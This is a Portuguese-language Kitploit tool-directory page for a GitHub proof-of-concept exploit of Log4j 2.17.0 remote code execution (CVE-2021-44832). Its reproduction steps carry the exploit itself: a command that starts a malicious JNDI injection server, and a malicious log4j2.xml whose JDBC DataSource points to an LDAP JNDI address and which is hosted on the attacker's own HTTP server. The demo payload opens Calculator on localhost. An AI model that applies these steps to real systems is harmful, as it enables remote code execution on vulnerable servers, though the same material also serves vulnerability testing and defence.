Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j_RCE_CVE-2021-44832 — Exploit de prova de conceito para Log4j 2.17.0 RCE (CVE-2021-44832) usando injeção JNDI com implantação de arquivo de configuração malicioso. | Kitploit
Ferramentas/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Exploit de prova de conceito para Log4j 2.17.0 RCE (CVE-2021-44832) usando injeção JNDI com implantação de arquivo de configuração malicioso.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
411há 4 anosAinda não revisado
Compartilhar

Log4j 2.17.0 RCE -- CVE-2021-44832

Reprodução

  1. Inicie o servidor JNDI malicioso
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. Modifique a parte DataSource no config/log4j2.xml para o endereço JNDI gerado
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

Implantar o arquivo de configuração em seu próprio servidor HTTP

  1. Modifique o PoC

Modifique para o arquivo de configuração implantado no servidor HTTP

  1. Execute

Tópico Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Bem-vindo a contribuir no reapoc

https://github.com/cckuailong/reapoc

Baixar ferramenta